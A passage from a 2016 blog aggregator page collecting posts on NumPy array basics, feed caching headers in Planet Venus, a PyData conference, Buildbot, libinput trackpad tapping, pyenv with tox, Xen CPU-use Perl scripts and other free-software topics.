As you can see you slice a multidimensional array by doing a separate slice for each dimension separated with commas. So with a 2D array our first slice defines the slicing for rows and our second slice defines the slicing for columns.

Notice that you can simply select a whole row or column by entering its number. The first example above selects from row 0, and the last example selects column 1.

The diagram below illustrates what the given example slices do.


Array Properties

When working with NumPy you might want to know certain things about your arrays. Luckily there are lots of handy methods included within the package to give you the information that you need.

# Array properties
a = np.array([[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25],
[26, 27, 28 ,29, 30],
[31, 32, 33, 34, 35]])

print(type(a)) # >>><class 'numpy.ndarray'>
print(a.dtype) # >>>int64
print(a.size) # >>>25
print(a.shape) # >>>(5, 5)
print(a.itemsize) # >>>8
print(a.ndim) # >>>2
print(a.nbytes) # >>>200
As you can see in the above code a NumPy array is actually called an ndarray. I don't know why it's called an ndarray, if anyone knows please leave a comment! My guess is that it stands for n dimensional array.

The shape of an array is how many rows and columns it has, the above array has 5 rows and 5 columns so its shape is (5, 5).

The 'itemsize' property is how many bytes each item takes up. The data type of this array is int64; there are 64 bits in an int64 and 8 bits in a byte, so divide 64 by 8 and you get the number of bytes each item takes up, which in this case is 8.

The 'ndim' property is how many dimensions the array has. This one has 2. A vector, for example, has just 1.

The 'nbytes' property is how many bytes are used up by all the data in the array. You should note that this does not count the overhead of an array and so the actual space that the array takes up will be a little bit larger.

WORKING WITH ARRAYS

Basic Operators

Just being able to make arrays and retrieve their elements and properties isn't going to get you very far; you will need to do maths on them sometimes too. You can do this using the basic operators such as +, -, /, etc.

# Basic Operators
a = np.arange(25)
a = a.reshape((5, 5))

b = np.array([10, 62, 1, 14, 2, 56, 79, 2, 1, 45,
4, 92, 5, 55, 63, 43, 35, 6, 53, 24,
56, 3, 56, 44, 78])
b = b.reshape((5,5))

print(a + b)
print(a - b)
print(a * b)
print(a / b)
print(a ** 2)
print(a < b)
print(a > b)

print(a.dot(b))
With the exception of dot() all of these operators work element-wise on the array. For example (a, b, c) + (d, e, f) would be (a+d, b+e, c+f). It will work separately on each element, pairing the corresponding elements up and doing arithmetic on them. It will then return an array of the results. Note that when using logical operators such as < and > an array of booleans will be returned, which has a very useful application which we will go through later.

The dot() function works out the dot product of two arrays. For 1D arrays (vectors) it returns a scalar (a value with just magnitude and no direction); for the 2D arrays used here it performs matrix multiplication and returns another array.

A Bit of the Maths Behind It

The dot() function computes something called the dot product. The best way to understand it is to see how it is calculated.
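
A small worked example makes it concrete (the vectors here are just for illustration): multiply corresponding elements, then add the results.

# Dot product, worked by hand and with NumPy
a = np.array([1, 2, 3])
b = np.array([4, 5, 6])

print((1 * 4) + (2 * 5) + (3 * 6)) # >>>32
print(a.dot(b)) # >>>32
print(np.sum(a * b)) # >>>32 (multiply element-wise, then sum)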


Array Specific Operators

There are also some useful operators provided by NumPy for processing an array.

# dot, sum, min, max, cumsum
a = np.arange(10)

print(a.sum()) # >>>45
print(a.min()) # >>>0
print(a.max()) # >>>9
print(a.cumsum()) # >>>[ 0 1 3 6 10 15 21 28 36 45]
The sum(), min() and max() functions are pretty obvious in what they do. Add up all the elements and find the minimum and maximum elements.

The cumsum() function however is a little less obvious. Like sum() it adds the elements together, but it keeps a running total: the first result is the first element, the second is the first plus the second, the third adds on the third element, and so on. It returns an array of these running totals, one for each element of the input.

Advanced Indexing

Fancy Indexing

'Fancy indexing' is a useful way of picking out specific array elements that you want to work with.

# Fancy indexing
a = np.arange(0, 100, 10)
indices = [1, 5, -1]
b = a[indices]
print(a) # >>>[ 0 10 20 30 40 50 60 70 80 90]
print(b) # >>>[10 50 90]
As you can see in the above example, we index the array with a sequence of the specific indexes that we want to retrieve. This in turn returns an array of the elements we indexed.

Boolean masking

Boolean masking is a fantastic feature that allows us to retrieve elements in an array based on a condition that we specify.

# Boolean masking
import matplotlib.pyplot as plt

a = np.linspace(0, 2 * np.pi, 50)
b = np.sin(a)
plt.plot(a,b)
mask = b >= 0
plt.plot(a[mask], b[mask], 'bo')
mask = (b >= 0) & (a <= np.pi / 2)
plt.plot(a[mask], b[mask], 'go')
plt.show()
The above example shows how to do boolean masking. All you have to do is index the array with a condition involving the array, and it will give you an array of the values for which that condition is true.

The example produces the following plot:
We use the conditions to select different points on the plot. The blue points (which in the diagram also include the green points, since the green points cover up the blue ones) show all the points that have a value greater than 0. The green points show all the points that have a value greater than 0 and are less than half pi.


Incomplete Indexing

Incomplete indexing is a convenient way of taking an index or slice from the first dimension of a multidimensional array. For example, if you had the array a = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]], then a[1] would give you everything at index 1 in the first dimension, which here is the second row, [6, 7, 8, 9, 10].

# Incomplete Indexing
a = np.arange(0, 100, 10)
b = a[:5]
c = a[a >= 50]
print(b) # >>>[ 0 10 20 30 40]
print(c) # >>>[50 60 70 80 90]

Where

The where() function is another useful way of retrieving elements of an array conditionally. Simply pass it a condition and it will return the indices at which that condition is true.

# Where
a = np.arange(0, 100, 10)
b = np.where(a < 50)
c = np.where(a >= 50)[0]
print(b) # >>>(array([0, 1, 2, 3, 4]),)
print(c) # >>>[5 6 7 8 9]


And that's NumPy. Not so hard, right? Of course this post only covers the basics to get you going; there are many other things you can do in NumPy that you should take a look at once you are comfortable with these basics.

Share this post so that other people can read it too and don't forget to subscribe to this blog via email, follow me on Twitter and/or add me on Google+ to make sure you don't miss any posts that you will find useful. Also, feel free to leave a comment whether to ask a question, point out something I've missed or anything else.

This is the second instalment in a series of posts on scientific Python. If you want to learn more about scientific Python, you might like these posts too:

by Planet Python at 2016-05-15 01:05

May 14, 2016

Planet Ubuntu

Kubuntu Wire: Care to help test Plasma 5.6.4? - Planet Ubuntu


 

Come over to #kubuntu-devel on freenode IRC.

by Planet Ubuntu at 2016-05-14 20:30

Planet Python

Anarcat: Long delays posting Debian Planet Venus - Planet Python

For the last few months, it seems that my posts haven't been reaching the Planet Debian aggregator correctly. I timed the last two posts and they both arrived roughly 10 days late in the feed.

SNI issues

At first, I suspected I was a victim of the SNI bug in Planet Venus: since it is still running on Python 2.7 and uses httplib2 (as opposed to, say, Requests), it has trouble with sites served over SNI. In January, there were 9 blogs with that problem on Planet. When this was discussed elsewhere in February, there were 18, and by March 21 had been reported. With everyone (like me) enabling Let's Encrypt on their website, this number is bound to grow.

I was able to reproduce the Debian Planet setup locally to do further tests, and ended up sending two (unrelated) patches to the Debian bug tracker against Planet Venus, the software running Debian Planet. In my local tests, I found 22 hosts with SNI problems. I also posted some pointers on how the code could be ported over to the more modern Requests and CacheControl modules.
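
For what it's worth, a minimal sketch of what such a port could look like (just an illustration, not one of the patches; the cache directory name is arbitrary):

import requests
from cachecontrol import CacheControl
from cachecontrol.caches.file_cache import FileCache

# Requests handles SNI out of the box, and CacheControl honours the
# Expires/Cache-Control headers much like the existing feed cache should.
session = CacheControl(requests.Session(), cache=FileCache(".webcache"))
response = session.get("https://anarc.at/tag/debian-planet/index.rss", timeout=30)
print(response.status_code, response.headers.get("Expires"))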

Expiry issues

However, some of those feeds were working fine on philp, the host I found was running as the Planet Master. Even more strange, my own website was working fine!

INFO:planet.runner:Feed https://anarc.at/tag/debian-planet/index.rss unchanged

Now that was strange: why was my feed fetched, but noted as unchanged? Digging around, I found a FAQ entry buried in the PlanetDebian wiki page which explicitly says that Planet obeys Expires headers diligently and will not fetch new content again until the headers say the old content has expired. Skeptical, I looked at my own headers and, ta-da! they were way off:

$ curl -v https://anarc.at/tag/debian-planet/index.rss 2>&1 | egrep  '< (Expires|Date)'
< Date: Sat, 14 May 2016 19:59:28 GMT
< Expires: Sat, 28 May 2016 19:59:28 GMT

So I lowered the expiry timeout on my RSS feeds to four hours:

root@marcos:/etc/apache2# git diff
diff --git a/apache2/conf-available/expires.conf b/apache2/conf-available/expires.conf
index 214f3dd..a983738 100644
--- a/apache2/conf-available/expires.conf
+++ b/apache2/conf-available/expires.conf
@@ -3,8 +3,18 @@
   # Enable expirations.
   ExpiresActive On

-  # Cache all files for 2 weeks after access (A).
-  ExpiresDefault A1209600
+  # Cache all files 12 hours after access
+  ExpiresDefault "access plus 12 hours"
+
+  # RSS feeds should refresh more often
+  <FilesMatch \.(rss)$>
+    ExpiresDefault "modification plus 4 hours"
+  </FilesMatch> 
+
+  # images are *less* likely to change
+  <FilesMatch "\.(gif|jpg|png|js|css)$">
+    ExpiresDefault "access plus 1 month"
+  </FilesMatch>

   <FilesMatch \.(php|cgi)$>
     # Do not allow scripts to be cached unless they explicitly send cache

I also lowered the general cache expiry, except for images, Javascript and CSS.

Planet Venus maintenance

A small last word about all this: I'm surprised to see that Planet Debian is running 6-year-old software that hasn't seen a single official release yet, with local patches on top. Venus seems to be well designed, I must give them that, but it's a little worrisome to see great software just rotting away like this.

A good "planet" site seems like a resource a lot of FLOSS communities would need: is there another "Planet-like" aggregator out there that is well maintained and more reliable? In Python, preferably.

PlanetPlanet, which Venus was forked from, is out of the question: it is even less maintained than the new fork, which itself seems to have died in 2011.

There is a discussion about the state of Venus on Github which reflects some of the concerns expressed here, as well as on the mailing list. The general consensus seems to be that everyone should switch over to Planet Pluto, which is written in Ruby.

I am not sure which planet Debian sits on - Pluto? Venus? Besides, Pluto is not even a planet anymore...

Mike check!

So this is also a test to see if my posts reach Debian Planet correctly. I suspect no one will ever see this at the top of their feeds, since the posts do get there, but with a 10-day delay and with the original date, so they are "sunk" down. The above expiration fixes won't take effect until the 10-day delay is over... But if you did see this as noise, retroactive apologies in advance for the trouble.

If you are reading this from somewhere else and wish to say hi, don't hesitate, it's always nice to hear from my readers.

by Planet Python at 2016-05-14 19:47

Ian Ozsvald: PyDataLondon 2016 Conference Write-up - Planet Python

We’ve just run our 3rd PyDataLondon Conference (2016) – 3 days, 4 tracks, 330 people.This builds on PyDataLondon 2015. It was ace! If you’d like to be notified about PyDataLondon 2017 then join this announce list (it’ll be super low volume like it has been for the last 2 years).

Big thanks to the organizers, sponsors and speakers, such a great conference it was. Being super tired going home on the train, but it was totally worth it. – Brigitta

We held it at Bloomberg UK again – many thanks to our hosts! I'd also like to thank my colleagues, the review committee and all our volunteers for their hard work; the weekend went incredibly smoothly, and that's because our team is so on top of everything – thanks!

Our keynote speakers were:

Our videos are being uploaded to YouTube. Slides will be linked against each author’s entry. There are an awful lot of happy comments on Twitter too. Our speakers covered Python, Julia, R, MCMC, clustering, geodata, financial modeling, visualisation, deployment, pipelines and a whole lot more. I spoke on Statistically Solving Sneezes and Sniffles (a citizen science project using ML to try to diagnose the causes of Rhinitis). Our Beginner Bootcamp (led by Conrad) had over 50 attendees!

…Let me second that. My first PyData also. It was incredible. Well organised – kudos to everyone who helped make it happen; you guys are pros. I found Friday useful as well, are the meetups like that? I’d love to be more involved in this community. –  lewis

We had two signing sessions for five authors with a ton of free books to give away:

  • Kyran Dale – Data Visualisation with Python and Javascript (these were the first copies in the UK!)
  • Amit Nandi – Spark for Python Developers
  • Malcolm Sherrington – Mastering Julia
  • Rui Miguel Forte – Mastering Predictive Analytics with R
  • Ian Ozsvald (me!) – High Performance Python (now in Italian, Polish and Japanese)

 

Some achievements

  • We used slack for all members at the conference – attendees started side-channels to share tutorial files, discuss the meets and recommend lunch venues (!)
  • We added an Unconference track (7 blank slots that anyone could sign-up for on the day), this brought us a nice random mix of new topics and round-table discussions
  • A new bioinformatics slack channel is likely to be formed due to collaborations at the conference
  • We signed up a ton of new volunteers to help us next year (thanks!)
  • An impromptu jobs board appeared on a notice board and was rapidly filled (if useful – also see my jobs list)

Thank you to all the organisers and speakers! It’s been my first PyData and it’s been great! – raffo

We had 15-20% female attendance this year, a slight drop on last year’s numbers (we’ll keep working to do better).

On a personal note it was great to see colleagues who I’ve coached in the past – especially as some were speaking or were a part of our organising committee.

With thanks to our sponsors and via ticket sales we raised more money this year for the NumFOCUS non-profit that backs the scientific Python stack (they give grants and stipends for contributors). We’d love to have more sponsors next year (this is especially useful if you’re hiring!). Thanks to:

Let me know if you do a write-up so I can link it here please:

If you’d like to hear about next year’s event then join this announce list (it’ll be super low volume). You probably also want to join our PyDataLondon meetup.

There are other upcoming PyData conferences including Berlin, Paris and Cologne. Take a look and get involved!

As an aside – if your data science team needs coaching, do drop me a line (and take a look at my coaching testimonials on LinkedIn). If you want a job in data science, take a look at my London Python data science jobs list.


Ian applies Data Science as an AI/Data Scientist for companies in ModelInsight, sign-up for Data Science tutorials in London. Historically Ian ran Mor Consulting. He also founded the image and text annotation API Annotate.io, co-authored SocialTies, programs Python, authored The Screencasting Handbook, lives in London and is a consumer of fine coffees.

by Planet Python at 2016-05-14 19:25

DataCamp: Free Kaggle Machine Learning Tutorial for Python - Planet Python

Always wanted to compete in a Kaggle competition, but not sure where to get started? Together with the team at Kaggle, we have developed a free interactive Machine Learning tutorial in Python that you can use in your Kaggle competitions! Step by step, through fun coding challenges, the tutorial will teach you how to predict survival rates for Kaggle's Titanic competition using Python and Machine Learning. Start the Machine Learning with Python tutorial now!

Learning Machine Learning with Python Interactively

This free Python tutorial is provided by DataCamp, an online interactive education platform that offers courses in data science. Each course is built around a certain data science topic and combines video instruction with in-browser coding challenges so that you can learn by doing. You can start every course for free, whenever you want, wherever you want.

The Machine Learning Tutorial

In this Machine Learning tutorial, you will gradually learn how basic machine learning techniques can help you to make better predictions. Go through all the steps, upload your results to Kaggle, and see your ranking go up. No need to install anything. Everything will take place in the comfort of your own browser. Learn:

  • How to load and manipulate your data set using Python.

  • How to make basic predictions using variables such as age and gender.

  • How to create your first decision tree.

  • How to make use of feature engineering to improve results.

  • What exactly 'overfitting' means, and how to avoid it.

  • How to make use of the ML technique Random Forests.
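
If you're curious what the decision-tree step looks like in code before diving into the course, here is a minimal, stand-alone sketch using scikit-learn; the tiny data set below is invented for illustration and is not taken from the Kaggle data or the DataCamp exercises.

# Minimal sketch (not part of the DataCamp course): a decision tree on
# made-up Titanic-style rows. Columns: passenger class, sex (0 = male,
# 1 = female), age. Labels: 1 = survived, 0 = did not survive.
from sklearn.tree import DecisionTreeClassifier

X_train = [
    [3, 0, 22.0],
    [1, 1, 38.0],
    [3, 1, 26.0],
    [1, 1, 35.0],
    [3, 0, 35.0],
]
y_train = [0, 1, 1, 1, 0]

tree = DecisionTreeClassifier(max_depth=3, random_state=42)
tree.fit(X_train, y_train)

# Predict survival for a hypothetical 30-year-old woman in first class.
print(tree.predict([[1, 1, 30.0]]))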

So don't wait and get started. Want to see other topics covered as well? Just let us know on Twitter.

Create your own course

Want to create your own course? With DataCamp Teach, you can easily create and host your own interactive tutorial for free. Use the same system DataCamp course creators use to develop their courses, and share your Python knowledge with the rest of the world. 

by Planet Python at 2016-05-14 19:24

Podcast.__init__: Episode 57 - Buildbot with Pierre Tardy - Planet Python

Visit our site to listen to past episodes, support the show, join our community, and sign up for our mailing list.

Summary

As technology professionals, we need to make sure that the software we write is reliably bug free and the best way to do that is with a continuous integration and continuous deployment pipeline. This week we spoke with Pierre Tardy about Buildbot, which is a Python framework for building and maintaining CI/CD workflows to keep our software projects on track.

Brief Introduction

  • Hello and welcome to Podcast.__init__, the podcast about Python and the people who make it great.
  • I would like to thank everyone who has donated to the show. Your contributions help us make the show sustainable. For details on how to support the show, subscribe, join our newsletter, check out the show notes, and get in touch you can visit our site at pythonpodcast.com
  • Linode is sponsoring us this week. Check them out at linode.com/podcastinit and get a $20 credit to try out their fast and reliable Linux virtual servers for your next project
  • We are also sponsored by Rollbar this week. Rollbar is a service for tracking and aggregating your application errors so that you can find and fix the bugs in your application before your users notice they exist. Use the link rollbar.com/podcastinit to get 90 days and 300,000 errors for free on their bootstrap plan.
  • Join our community! Visit discourse.pythonpodcast.com for your opportunity to find out about upcoming guests, suggest questions, and propose show ideas.
  • Your hosts as usual are Tobias Macey and Chris Patti
  • Today we are interviewing Pierre Tardy about the Buildbot continuous integration system.
Linode Sponsor Banner

Use the promo code podcastinit20 to get a $20 credit when you sign up!

Rollbar Logo

I’m excited to tell you about a new sponsor of the show, Rollbar.

One of the frustrating things about being a developer, is dealing with errors… (sigh)

  • Relying on users to report errors
  • Digging thru log files trying to debug issues
  • A million alerts flooding your inbox ruining your day…

With Rollbar’s full-stack error monitoring, you get the context, insights and control you need to find and fix bugs faster. It’s easy to get started tracking the errors and exceptions in your stack. You can start tracking production errors and deployments in 8 minutes - or less, and Rollbar works with all major languages and frameworks, including Ruby, Python, Javascript, PHP, Node, iOS, Android and more. You can integrate Rollbar into your existing workflow such as sending error alerts to Slack or Hipchat, or automatically create new issues in Github, JIRA, Pivotal Tracker etc.

We have a special offer for Podcast.__init__ listeners. Go to rollbar.com/podcastinit, sign up, and get the Bootstrap Plan free for 90 days. That’s 300,000 errors tracked for free. Loved by developers at awesome companies like Heroku, Twilio, Kayak, Instacart, Zendesk, Twitch and more. Help support Podcast.__init__ and give Rollbar a try today. Go to rollbar.com/podcastinit

Interview with Pierre Tardy

  • Introductions
  • How did you get introduced to Python? - Chris
  • For anyone who isn’t familiar with it can you explain what Buildbot is? - Tobias
  • What was the original inspiration for creating the project? - Tobias
  • How did you get involved in the project? - Tobias
  • Can you describe the internal architecture of Buildbot and outline how a typical workflow would look? - Tobias
  • There are a number of packages out on PyPI for doing subprocess invocation and control, in addition to the functions in the standard library. Which does buildbot use and why? - Chris
  • What makes Buildbot stand out from other CI/CD options that are available today? - Tobias
  • Scaling a large CI/CD system can become a challenge. What are some of the limiting factors in the Buildbot architecture and in what ways have you seen people work to overcome them? - Tobias
  • Are there any design or architecture choices that you would change in the project if you were to start it over? - Tobias
  • If you were starting from scratch on implementing buildbot today, would you still use Python? Why? - Chris
  • What are some of the most difficult challenges that have been faced in the creation and evolution of the project? - Tobias
  • What are some of the most notable uses of Buildbot and how do they uniquely leverage the capabilities of the framework? - Tobias
  • What are some of the biggest challenges that people face when beginning to implement Buildbot in their architecture? - Tobias
  • Does buildbot support the use of docker or public clouds as a part of the build process? - Chris
  • I know that the execution engine for Buildbot is written in Twisted. What benefits does that provide and how has that influenced any efforts for providing Python 3 support? - Tobias
  • Does buildbot support build parallelization at all? For instance splitting one very long test run up into 3 instances each running a section of tests to cut build time? - Chris
  • What are some of the most requested features for the project and are there any that would be unreasonably difficult to implement due to the current design of the project? - Tobias
  • Does buildbot offer a plugin system like Jenkins does, or is there some other approach it uses for custom extensions to the base buildbot functionality? - Chris
  • Managing a reliable build pipeline can be operationally challenging. What are some of the thorniest problems for Buildbot in this regard and what are some of the mechanisms that are built in to simplify the operational characteristics? - Tobias
  • What were some of the challenges around supporting slaves running on platforms with very different environmental characteristics like Microsoft Windows? - Chris
  • What is on the roadmap for Buildbot? - Tobias

Keep In Touch

Picks

Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA


by Planet Python at 2016-05-14 18:51

More Words, Deeper Hole

Canadian comic artist, writer Darwyn Cooke dies - More Words, Deeper Hole


Darwyn Cooke, the artist and writer who made a name for himself in mainstream comics with a retro style and a belief that more comics should be aimed at the children’s audience the industry had left behind, died on May 14. The day before, his family released a statement that he had entered palliative care after undergoing treatment for an “aggressive” cancer.

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-14 16:06

Planet Debian

Thadeu Lima de Souza Cascardo: Chromebook Trackpad - Planet Debian

Three years ago, I wanted to get a new laptop. I wanted something that could run free software, preferably without blobs, with some good amount of RAM, good battery and very light, something I could carry along with a work laptop. And I didn't want to spend too much. I don't want to make this too long, so in the end, I asked in the store for anything that didn't come with Windows installed, and before I was dragged into the Macbook section, I shouted "and no Apple!". That's how I got into the Chromebook section with two options before me.

There was the Chromebook Pixel, too expensive for me, and the Samsung Chromebook, using ARM. Getting a laptop with an ARM processor was interesting for me, because I like playing with different stuff. I looked up whether it would be possible to run something other than ChromeOS on it, got the sense that yes, it would, and made the call. It does not have too much RAM, but it was cheap. I got an external HD to compensate for the lack of storage (only 16GB eMMC), and that was it.

Wifi does require non-free firmware to be loaded, but booting was a nice surprise. It is not perfect, but I will see if I can get to that another day.

I managed to get Fedora installed, downloading chunks of an image that I could write into the storage. After a while, I backed up home, and installed Debian using debootstrap.

Recently, after an upgrade from wheezy to jessie, things stopped working. systemd would not mount the most basic partitions and would simply stop very early in the boot process. That's a story on my backlog as well, that I plan to tell soon, since I believe this connects with supporting Debian on mobile devices.

After fixing some things, I decided to try libinput instead of synaptics for the Trackpad. The Chromebook uses a Cypress APA Trackpad. The driver was upstreamed in Linux 3.9. The Chrome OS ships with Linux 3.4, but had the driver in its branch.

After changing to libinput, I realized clicking did not work. Neither did tapping. I moved back to synaptics, and was reminded things didn't work too well with that either. I always had to enable tapping.

I have some experience with input devices. I wrote drivers, small applications reacting to some events, and some uinput userspace drivers as well. I like playing with that subsystem a lot. But I don't have too much experience with multitouch and libinput is kind of new for me too.

I got my hands on the code and found out there is libinput-debug-events. It will show you how libinput translates evdev events. I clicked on the Trackpad and got nothing but some pointer movements. I tried evtest and there were some multitouch events I didn't understand too well, but it looked like there were important events there that I thought libinput should have recognized.

I tried reading some of libinput code, but didn't get too far before I tried something else. But then, I had to let this exercise for another day. Today, I decided to do it again. Now, with some fresh eyes, I looked at the driver code. It showed support for left, right and middle buttons. But maybe my device doesn't support it, because I don't remember seeing it on evtest when clicking the Trackpad. I also understood better the other multitouch events, they were just saying how many fingers there were and what was the position of which one of them. In the case of a single finger, you still get an identifier. For better understanding of all this, reading Documentation/input/event-codes.txt and Documentation/input/multi-touch-protocol.txt is recommended.

So, in trying to answer whether libinput needs to handle my device's events properly, or handle my device specially, or whether the driver requires changes, or what else I can do to have a better experience with this Trackpad, things were tending towards the driver and device. Then, after running evtest, I noticed a BTN_LEFT event. OK, so the device and driver support it, what is libinput doing with that? Running evtest and libinput-debug-events at the same time, I found out the problem. libinput was handling BTN_LEFT correctly, but the driver was not reporting it all the time.

By going through the driver, it looks like this is either a firmware or a hardware problem. When you get the click response, sound and everything, the driver will not always report it. It could be pressure, electrical contact, I can't tell for sure. But the driver does not check for anything but what the firmware has reported, so it's not the driver.

A very interesting thing I found out is that you can read and write the firmware. I dumped it to a file, but still could not analyze what it is. There are some commands to put the driver into some bootloader state, so maybe it's possible to play with the firmware without bricking the device, though I am not sure yet. Even then, the problem might not be fixable by just changing the firmware.

So, I was left with the possibility of using tapping, which was not working with libinput. Grepping through the code, I found out from the libinput documentation that tapping needs to be enabled. The libinput xorg driver supports that. Just set the Tapping option to true and that's it.
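
For the record, the snippet for that, dropped into /etc/X11/xorg.conf.d/, looks something like this (the file name is arbitrary, and matching on MatchIsTouchpad is just one common way to target the device):

Section "InputClass"
        Identifier "libinput touchpad tapping"
        MatchIsTouchpad "on"
        Driver "libinput"
        Option "Tapping" "on"
EndSection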

So, now I am a happy libinput user, with some of the same issues I had before with synaptics, but something you get used to. And I have a new firmware in front of me that maybe we could tackle by some reverse engineering.

by Thadeu Lima de Souza Cascardo at 2016-05-14 15:26

Planet Python

Holger Peters: Using pyenv and tox - Planet Python

I usually use pyenv to manage my Python interpreters and obtain them in whatever version I need. Another tool I occasionally use is tox by Holger Krekel, which nicely generates build matrices for library and python interpreter versions, which come in handy when you develop a library targeting multiple Python versions (and dependencies).

However, until recently I didn't know how to use the two of them together. With pyenv, I usually ended up with one python interpreter in my path, so tox had only one interpreter to choose from, and I was missing out on tox' selling point: testing your code over various versions of Python.

Install Multiple Python Versions With Pyenv

Setting up your pyenv usually looks like this:

% pyenv install 3.5.1
% pyenv install 2.7.10
% cd my_project_dir
% pyenv local 3.5.1

Now it is possible to use multiple Python versions here:

% pyenv local 3.5.1 2.7.10
% python3.5 --version
Python 3.5.1
% python2.7 --version
Python 2.7.10

Then, tox can find interpreters, typically you will have a tox.ini in your project that starts with something like this:

[tox]
envlist = py27,py34,py35
skip_missing_interpreters = True

[testenv]
commands=py.test
deps = -rrequirements.txt

Invoking tox should now run the test suite against the two available Python versions, 2.7 and 3.5, skipping 3.4 unless it is installed.
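
A run then looks roughly like this (output trimmed; the exact summary format depends on your tox version, and I'm assuming here that Python 3.4 is not installed):

% tox
...
_________________ summary _________________
  py27: commands succeeded
SKIPPED:  py34: InterpreterNotFound: python3.4
  py35: commands succeeded
  congratulations :)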

by Planet Python at 2016-05-14 15:25

Making Light

Open thread 212 - Making Light

There's a stand at the street market in Waterlooplein that sells old postcards. Sometimes what a person finds there is...

by Abi Sutherland at 2016-05-14 11:51

Planet Debian

Russell Coker: Xen CPU Use per Domain again - Planet Debian

8 years ago I wrote a script to summarise Xen CPU use per domain [1]. Since then changes to Xen required changes to the script. I have new versions for Debian/Wheezy (Xen 4.1) and Debian/Jessie (Xen 4.4).

Here’s a new script for Debian/Wheezy:

#!/usr/bin/perl
use strict;

open(LIST, "xm list --long|") or die "Can't get list";

my $name = "Dom0";
my $uptime = 0.0;
my $cpu_time = 0.0;
my $total_percent = 0.0;
my $cur_time = time();

open(UPTIME, "</proc/uptime") or die "Can't open /proc/uptime";
my @arr = split(/ /, <UPTIME>);
$uptime = $arr[0];
close(UPTIME);

my %all_cpu;

while(<LIST>)
{
  chomp;
  if($_ =~ /^\)/)
  {
    my $cpu = $cpu_time / $uptime * 100.0;
    if($name =~ /Domain-0/)
    {
      printf("%s uses %.2f%% of one CPU\n", $name, $cpu);
    }
    else
    {
      $all_cpu{$name} = $cpu;
    }
    $total_percent += $cpu;
    next;
  }
  $_ =~ s/\).*$//;
  if($_ =~ /start_time /)
  {
    $_ =~ s/^.*start_time //;
    $uptime = $cur_time - $_;
    next;
  }
  if($_ =~ /cpu_time /)
  {
    $_ =~ s/^.*cpu_time //;
    $cpu_time = $_;
    next;
  }
  if($_ =~ /\(name /)
  {
    $_ =~ s/^.*name //;
    $name = $_;
    next;
  }
}
close(LIST);

sub hashValueDescendingNum {
  $all_cpu{$b} <=> $all_cpu{$a};
}

my $key;

foreach $key (sort hashValueDescendingNum (keys(%all_cpu)))
{
  printf("%s uses %.2f%% of one CPU\n", $key, $all_cpu{$key});
}

printf("Overall CPU use approximates %.1f%% of one CPU\n", $total_percent);

Here’s the script for Debian/Jessie:

#!/usr/bin/perl

use strict;

open(UPTIME, "xl uptime|") or die "Can't get uptime";
open(LIST, "xl list|") or die "Can't get list";

my %all_uptimes;

while(<UPTIME>)
{
  chomp $_;

  next if($_ =~ /^Name/);
  $_ =~ s/ +/ /g;

  my @split1 = split(/ /, $_);
  my $dom = $split1[0];
  my $uptime = 0;
  my $time_ind = 2;
  if($split1[3] eq "days,")
  {
    $uptime = $split1[2] * 24 * 3600;
    $time_ind = 4;
  }
  my @split2 = split(/:/, $split1[$time_ind]);
  $uptime += $split2[0] * 3600 + $split2[1] * 60 + $split2[2];
  $all_uptimes{$dom} = $uptime;
}
close(UPTIME);

my $total_percent = 0;

while(<LIST>)
{
  chomp $_;

  my $dom = $_;
  $dom =~ s/ .*$//;

  if ( $_ =~ /(\d+)\.[0-9]$/ )
  {
    my $percent = $1 / $all_uptimes{$dom} * 100.0;
    $total_percent += $percent;
    printf("%s uses %.2f%% of one CPU\n", $dom, $percent);
  }
  else
  {
    next;
  }
}

printf("Overall CPU use approximates  %.1f%% of one CPU\n", $total_percent);
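
For reference, a hypothetical run of the Jessie version looks something like this (assuming you saved it as, say, xen-cpu-use.pl and made it executable; the domain names and numbers below are made up):

# ./xen-cpu-use.pl
Domain-0 uses 3.05% of one CPU
webserver uses 12.34% of one CPU
mailserver uses 1.21% of one CPU
Overall CPU use approximates  16.6% of one CPU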

by etbe at 2016-05-14 09:30

Michal Čihař: Fifteen years with phpMyAdmin and free software - Planet Debian

Today it's fifteen years since my first contribution to free software. I've changed several jobs since that time, all of them involved quite a lot of free software, and now I'm fully working on free software.

The first contribution happened to be to phpMyAdmin and consisted of a Czech translation:

Subject: Updated Czech translation of phpMyAdmin
From: Michal Cihar <cihar@email.cz>
To: swix@users.sourceforge.net
Date: Mon, 14 May 2001 11:23:36 +0200
X-Mailer: KMail [version 1.2]

Hi

I've updated (translated few added messages) Czech translation of phpMyAdmin. 
I send it to you in two encodings, because I thing that in distribution 
should be included version in ISO-8859-2 which is more standard than Windows 
1250.

Regards
    Michal Cihar

Many other contributions came afterwards, several projects died on the way, but it has been a great ride so far. To see some of these you can look at my software page, which contains both current and past projects and also includes tools I created earlier (mostly for Windows) that were opensourced later.

These days you can find me being active on phpMyAdmin, Gammu, python-gammu and Wammu, Debian and Weblate.

Filed under: Debian English phpMyAdmin SUSE | 2 comments

by Michal Čihař at 2016-05-14 09:23

Kevin and Kell

Chameleon selfies - Kevin and Kell

Comic for Saturday May 14th, 2016 - "Chameleon selfies" [ view ]

On this day in 1998, Kevin was starting to wonder what to tell the trash collectors since there isn't anything his mixed family leaves to waste... [ view ]

Today's Daily Sponsor - No sponsor for this strip. [ support ]

by Kevin and Kell at 2016-05-14 05:00

The Endeavour

Top tweets - The Endeavour

I had a couple tweets this week that were fairly popular. The first was a pun on the musical Hamilton and the Hamiltonian from physics. The former is about Alexander Hamilton (1755–1804) and the latter is named after William Rowan Hamilton (1805–1865).

The second was a sort of snowclone, a variation on the line from the Bhagavad Gita that J. Robert Oppenheimer famously quoted in reference to the atomic bomb:

by John at 2016-05-14 03:02

Planet Debian

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems - Planet Debian

In the ARM world, to which I am still mostly a newcomer (although I've already been playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed.

Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux.

In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful — And fun.

